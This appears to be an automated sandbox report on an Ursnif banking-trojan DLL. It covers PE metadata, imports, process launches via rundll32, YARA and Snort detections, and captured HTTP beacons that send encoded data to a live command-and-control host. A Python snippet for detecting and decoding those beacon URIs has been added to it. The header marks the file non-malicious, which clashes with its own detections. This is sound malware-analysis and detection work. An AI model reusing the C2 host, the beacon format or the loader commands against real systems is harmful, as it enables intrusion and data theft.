                                    SHA-256:C91DAE2CF83E6662D924132FEFA3347DF0B845E3B3AD46691C8B3ACDF7A08752
                                    SHA-512:34E1D4659E340E3C0109315D43E0B63B9CE1E99CC3FF4ABDB775D0B76EA6CFD7F9A70199683E07776B136E9279BE25DE28A7D95E466864CCDC18B9E0B9555794
                                    Malicious:false

                                    Static File Info

                                    General

                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.27197014467762
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.39%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.21%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • VXD Driver (31/22) 0.00%
                                    File name:2e.dll
                                    File size:79704
                                    MD5:92a0f1023e064a46fbf2e6bb697edf55
                                    SHA1:d2d28a35de82e8161266355a351a1e5822d49303
                                    SHA256:2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
                                    SHA512:1ac25076dc2214eba995e2fab4e4ef43d998d7b75729efa3a9f75907cc18e088669444498a5f0111d237e361d0221fe6b8f1a5a9c8cdb9237e0b657a4f935b50
                                    SSDEEP:1536:S6+YO9+zA3PG713sAOFU+okNIXnioQ+Zw:SQO9+zAe71JykkNIXnjw
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!...2.D..........@........`...............................`.......'.....................................

                                    File Icon

                                    Icon Hash:74f0e4ecccdce0e4

                                    Static PE Info

                                    General

                                    Entrypoint:0x10001240
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x10000000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x6008010E [Wed Jan 20 10:08:14 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:ff4d958d1b207f788303c2824dcf7c89

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:CN=MHVROHWNPUNPYUVDPT
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 1/20/2021 8:14:49 AM 1/1/2040 12:59:59 AM
                                    Subject Chain
                                    • CN=MHVROHWNPUNPYUVDPT
                                    Version:3
                                    Thumbprint MD5:08CCE083A5F15BBCB12A773F84B1C54B
                                    Thumbprint SHA-1:1B184C8F112872329F0305241D2CE46BCFF9D291
                                    Thumbprint SHA-256:B68B47B76E495611F29CD73B2184C2E24A4CAC0161C902D42588E075D7B7EB95
                                    Serial:36CB7E2011A25C9644D2EF1B2384DF4C

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0000009Ch
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-04h], 00000000h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov dword ptr [ebp-08h], 00001AC9h
                                    mov ecx, dword ptr [ebp+08h]
                                    mov dword ptr [10014354h], ecx
                                    mov dword ptr [10014334h], ebp
                                    mov dword ptr [ebp-0Ch], 00000064h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    lea ecx, dword ptr [ebp-78h]
                                    push ecx
                                    call dword ptr [1001366Ch]
                                    movzx edx, byte ptr [ebp-78h]
                                    cmp edx, 4Ah
                                    jne 00007F8798F4A03Bh
                                    movzx eax, byte ptr [ebp-76h]
                                    cmp eax, 68h
                                    jne 00007F8798F4A032h
                                    movzx ecx, byte ptr [ebp-74h]
                                    cmp ecx, 44h
                                    jne 00007F8798F4A029h
                                    xor eax, eax
                                    jmp 00007F8798F4CE05h
                                    mov dword ptr [ebp-00000084h], 00000001h
                                    mov dword ptr [ebp-0000008Ch], 00000001h
                                    mov dword ptr [ebp-00000094h], 00000001h
                                    mov dword ptr [ebp-7Ch], 00000001h

                                    Data Directories

                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x130e0 | 0xa0 | .data
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x12200 | 0x1558 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15000 | 0x470 | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x1342c | 0x2ac | .data
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                     Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0x43ae | 0x4400 | False | 0.112764246324 | data | 4.33287623125 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                     .data2 | 0x6000 | 0x64 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .rdata | 0x7000 | 0xbc04 | 0xbe00 | False | 0.910916940789 | data | 7.78728301124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data | 0x13000 | 0x13b4 | 0x1400 | False | 0.4572265625 | data | 5.39696866676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                     .reloc | 0x15000 | 0x470 | 0x600 | False | 0.6484375 | data | 5.29273292424 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Imports

                                     DLL | Import
                                     KERNEL32.dll | LoadLibraryA, GetProcAddress, LoadResource, GetModuleHandleA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, GetLastError, FindResourceExW, FindResourceW, LockResource, SizeofResource, GetModuleHandleW, GetModuleFileNameW, lstrcpynW, LoadLibraryExA, LoadLibraryExW, FreeLibrary, ExpandEnvironmentStringsW, lstrcpyW, GetFileAttributesW, LoadLibraryW, LCMapStringW, FreeEnvironmentStringsW, SetStdHandle, QueueUserAPC, ClearCommError, GetDiskFreeSpaceA, GetProfileSectionW, SetConsoleCursorPosition, GetTempPathW, VerSetConditionMask, GetSystemWindowsDirectoryW, SetVolumeMountPointW, GetFileType, lstrcmp, IsBadHugeWritePtr, CreateMutexW, EnumDateFormatsA, GetStringTypeExW, GetTapeStatus, TransactNamedPipe, SetThreadAffinityMask, EnumLanguageGroupLocalesA, CreateJobObjectW, lstrcmpA, ScrollConsoleScreenBufferW, _lcreat, GetVolumePathNameW, GetSystemDirectoryA, ResetWriteWatch, GlobalGetAtomNameW, SetCriticalSectionSpinCount, DefineDosDeviceA, GetLogicalDrives, SetConsoleCtrlHandler, MoveFileExW, HeapSize, RequestDeviceWakeup, ReadFile, GetProcessPriorityBoost, WriteProfileSectionA, TlsFree, IsDebuggerPresent, InterlockedCompareExchange, TlsAlloc, TlsGetValue, TlsSetValue, GetSystemTime, GetFullPathNameW, GetFullPathNameA, LockFileEx, LockFile, Sleep, UnlockFile, GetFileSize, SetEndOfFile, FlushFileBuffers, SetFilePointer, WriteFile, CloseHandle, WideCharToMultiByte, GetTempPathA, CreateFileW, CreateFileA, GetFileAttributesA, GetVersionExA, DeleteFileW, DeleteFileA, SetLastError, InterlockedExchange, lstrlenA, RaiseException
                                     USER32.dll | LoadCursorA, CharUpperA, GetClipboardData, GetMessagePos, wsprintfW, LoadStringW, CharToOemW, SetCapture, CallNextHookEx, GetOpenClipboardWindow, VkKeyScanExW, SetMenuItemInfoW, CloseDesktop, EnumDisplaySettingsW, LoadIconW, RegisterClassExA, LookupIconIdFromDirectoryEx, CharUpperBuffA, DdeInitializeW, SetPropW, GetActiveWindow, GetDlgItemTextA, SetWindowsHookA, EnumDesktopsA, DeferWindowPos, EnumWindowStationsA, GetClipboardOwner, PostThreadMessageW, GetSysColorBrush, SetParent, ShowOwnedPopups, RealGetWindowClassW, RegisterClassExW, DdeFreeStringHandle
                                     GDI32.dll | RealizePalette, GetBkMode, GdiEntry12, CreateDiscardableBitmap, GdiAddGlsBounds, SetTextColor, GdiGetDC, STROBJ_bGetAdvanceWidths
                                     ADVAPI32.dll | GetUserNameA, RegOpenKeyA, LookupAccountSidW, RegCloseKey, AllocateAndInitializeSid
                                     SHELL32.dll | SHQueryRecycleBinA, ShellExecuteExA, ExtractIconExA, WOWShellExecute, SHLoadNonloadedIconOverlayIdentifiers, SHGetDataFromIDListW, SHAddToRecentDocs, SHCreateDirectoryExA, DuplicateIcon, SHGetSpecialFolderPathW
                                     ole32.dll | CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize
                                     SHLWAPI.dll | StrChrIA, StrRStrIW, StrCmpNIW, PathAppendW

                                    Network Behavior

                                    Snort IDS Alerts

                                     Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                     10/07/21-16:20:47.437292 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     10/07/21-16:20:47.437292 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     10/07/21-16:21:32.362408 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49824 | 80 | 192.168.2.4 | 87.106.18.141

                                    Network Port Distribution

                                    TCP Packets

                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Oct 7, 2021 16:20:47.406502962 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.407130957 CEST | 49793 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.428611994 CEST | 80 | 49792 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.428718090 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.428965092 CEST | 80 | 49793 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.429749012 CEST | 49793 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.437292099 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.459446907 CEST | 80 | 49792 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.510512114 CEST | 80 | 49792 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.510575056 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.809303045 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:47.831645012 CEST | 80 | 49792 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.857217073 CEST | 80 | 49792 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:20:47.857317924 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:48.718842983 CEST | 49792 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:20:48.720160961 CEST | 49793 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.339324951 CEST | 49823 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.339402914 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.360322952 CEST | 80 | 49824 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.360430956 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.361443043 CEST | 80 | 49823 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.362091064 CEST | 49823 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.362407923 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.383151054 CEST | 80 | 49824 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.410106897 CEST | 80 | 49824 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.410197973 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.624552011 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:32.670840979 CEST | 80 | 49824 | 87.106.18.141 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.670943975 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:33.698580980 CEST | 49824 | 80 | 192.168.2.4 | 87.106.18.141
                                     Oct 7, 2021 16:21:33.698653936 CEST | 49823 | 80 | 192.168.2.4 | 87.106.18.141

                                    UDP Packets

                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Oct 7, 2021 16:20:47.362231970 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                     Oct 7, 2021 16:20:47.380968094 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                     Oct 7, 2021 16:21:32.303180933 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                     Oct 7, 2021 16:21:32.328233004 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4

                                    DNS Queries

                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                     Oct 7, 2021 16:20:47.362231970 CEST | 192.168.2.4 | 8.8.8.8 | 0x67ce | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
                                     Oct 7, 2021 16:21:32.303180933 CEST | 192.168.2.4 | 8.8.8.8 | 0x3b39 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)

                                    DNS Answers

                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                     Oct 7, 2021 16:20:47.380968094 CEST | 8.8.8.8 | 192.168.2.4 | 0x67ce | No error (0) | api10.laptok.at | (none) | 87.106.18.141 | A (IP address) | IN (0x0001)
                                     Oct 7, 2021 16:21:32.328233004 CEST | 8.8.8.8 | 192.168.2.4 | 0x3b39 | No error (0) | api10.laptok.at | (none) | 87.106.18.141 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • api10.laptok.at

                                    HTTP Packets

                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                     0 | 192.168.2.4 | 49792 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                     Timestamp | kBytes transferred | Direction | Data
                                     Oct 7, 2021 16:20:47.437292099 CEST | 1970 | OUT | GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1
                                     Accept: text/html, application/xhtml+xml, image/jxr, */*
                                     Accept-Language: en-US
                                     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                     Accept-Encoding: gzip, deflate
                                     Host: api10.laptok.at
                                     Connection: Keep-Alive
                                     Oct 7, 2021 16:20:47.510512114 CEST | 1971 | IN | HTTP/1.1 200 OK
                                     Server: nginx/1.14.2
                                     Date: Thu, 07 Oct 2021 14:20:47 GMT
                                     Content-Type: text/plain
                                     Transfer-Encoding: chunked
                                     Connection: keep-alive
                                     Data Raw: 30 0d 0a 0d 0a
                                     Data Ascii: 0
                                     Oct 7, 2021 16:20:47.809303045 CEST | 1971 | OUT | GET /favicon.ico HTTP/1.1
                                     Accept: */*
                                     Accept-Encoding: gzip, deflate
                                     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                     Host: api10.laptok.at
                                     Connection: Keep-Alive
                                     Oct 7, 2021 16:20:47.857217073 CEST | 1971 | IN | HTTP/1.1 200 OK
                                     Server: nginx/1.14.2
                                     Date: Thu, 07 Oct 2021 14:20:47 GMT
                                     Content-Type: text/plain
                                     Transfer-Encoding: chunked
                                     Connection: keep-alive
                                     Data Raw: 30 0d 0a 0d 0a
                                     Data Ascii: 0


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                     1 | 192.168.2.4 | 49824 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                     Timestamp | kBytes transferred | Direction | Data
                                     Oct 7, 2021 16:21:32.362407923 CEST | 5628 | OUT | GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1
                                     Accept: text/html, application/xhtml+xml, image/jxr, */*
                                     Accept-Language: en-US
                                     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                     Accept-Encoding: gzip, deflate
                                     Host: api10.laptok.at
                                     Connection: Keep-Alive
                                     Oct 7, 2021 16:21:32.410106897 CEST | 5629 | IN | HTTP/1.1 200 OK
                                     Server: nginx/1.14.2
                                     Date: Thu, 07 Oct 2021 14:21:32 GMT
                                     Content-Type: text/plain
                                     Transfer-Encoding: chunked
                                     Connection: keep-alive
                                     Data Raw: 30 0d 0a 0d 0a
                                     Data Ascii: 0
                                     Oct 7, 2021 16:21:32.624552011 CEST | 5629 | OUT | GET /favicon.ico HTTP/1.1
                                     Accept: */*
                                     Accept-Encoding: gzip, deflate
                                     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                     Host: api10.laptok.at
                                     Connection: Keep-Alive
                                     Oct 7, 2021 16:21:32.670840979 CEST | 5629 | IN | HTTP/1.1 200 OK
                                     Server: nginx/1.14.2
                                     Date: Thu, 07 Oct 2021 14:21:32 GMT
                                     Content-Type: text/plain
                                     Transfer-Encoding: chunked
                                     Connection: keep-alive
                                     Data Raw: 30 0d 0a 0d 0a
                                     Data Ascii: 0
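The two GET requests above are what the Snort signatures in this report (ET SIDs 2033203, "M1 (_2B)", and 2033204, "M2 (_2F)") key on: the pseudo-directory path carries base64 data in which "+" and "/" have been percent-encoded and the "%" swapped for "_", and the result is chopped into slash-separated segments. The following is an added example (not code from the report or from the sample) that performs the same token-based triage over the captured request lines and then undoes the transport encoding so the opaque payload can be sized and compared between the two check-ins. Assumptions, also marked in the code: the first segment ("api1") is a fixed prefix rather than payload, base64 padding was dropped by the sender, and the decoded bytes are still the bot's encrypted check-in data, which this code does not decrypt. The two request paths are copied from the capture; the request log around them is constructed. Note that in the first request one token straddles a segment boundary ("/pNJBMQ_2/B9Q8..."), which is why the counting is done after rejoining the segments rather than on the raw path.

```python
"""Triage of Ursnif/ISFB check-in URIs: the token check the ET rules use,
plus decoding of the transport layer so the payload can be sized.
Added example code; not from the Joe Sandbox report or the sample."""
import base64
import re

# The two request paths from the capture (copied from the HTTP packets
# section) plus the benign favicon fetches, as a constructed mini-log.
URI_1 = ("/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/"
         "m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/"
         "B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/"
         "8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/"
         "TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/"
         "loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B")
URI_2 = ("/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/"
         "V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/"
         "ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/"
         "umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/"
         "vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/"
         "GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l")
REQUEST_LOG = [("GET", URI_1), ("GET", "/favicon.ico"),
               ("GET", URI_2), ("GET", "/favicon.ico")]

# base64 '+' and '/', percent-encoded with the '%' replaced by '_'.
TOKENS = ("_2B", "_2F")


def segments(path: str) -> list[str]:
    """Path components, without a query string and without empty pieces."""
    return [s for s in path.split("?", 1)[0].split("/") if s]


def token_counts(path: str) -> dict[str, int]:
    """Count the tokens after rejoining the segments: a token can straddle a
    '/', which a raw-content match on the path would miss."""
    joined = "".join(segments(path))
    return {t: joined.count(t) for t in TOKENS}


def looks_like_ursnif_uri(path: str, min_segments: int = 6) -> bool:
    """Heuristic: many segments made only of [A-Za-z0-9_] and at least one token."""
    segs = segments(path)
    if len(segs) < min_segments:
        return False
    if not all(re.fullmatch(r"[A-Za-z0-9_]+", s) for s in segs):
        return False
    return any(token_counts(path).values())


def recover_payload(path: str) -> bytes:
    """Undo the transport encoding and return the still-encrypted payload.
    Assumptions: the first segment ('api1') is a fixed prefix, not payload,
    and the sender dropped the base64 padding."""
    b64 = "".join(segments(path)[1:]).replace("_2B", "+").replace("_2F", "/")
    if re.search(r"[^A-Za-z0-9+/]", b64):
        raise ValueError("characters left over after token mapping: not this encoding")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64, validate=True)


def triage(log) -> list[tuple[str, int]]:
    """Flagged paths from a (method, path) log, with their payload size in bytes."""
    return [(p, len(recover_payload(p))) for _method, p in log if looks_like_ursnif_uri(p)]


if __name__ == "__main__":
    for path, size in triage(REQUEST_LOG):
        print(size, token_counts(path), path[:40] + "...")
```

Both captured check-ins carry a payload of the same size once decoded, which is the kind of invariant worth carrying into a hunt query alongside the token match; a raw search for "_2B" on the first path finds one token fewer than the rejoined count, because of the split token.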


                                    Code Manipulations

                                    Statistics

                                     CPU Usage

                                     Memory Usage

                                     High Level Behavior Distribution

                                     Behavior

                                    System Behavior

                                    General

                                    Start time:16:19:49
                                    Start date:07/10/2021
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
                                    Imagebase:0xfd0000
                                    File size:893440 bytes
                                    MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:16:19:50
                                    Start date:07/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:19:50
                                    Start date:07/10/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
                                    Imagebase:0x1c0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
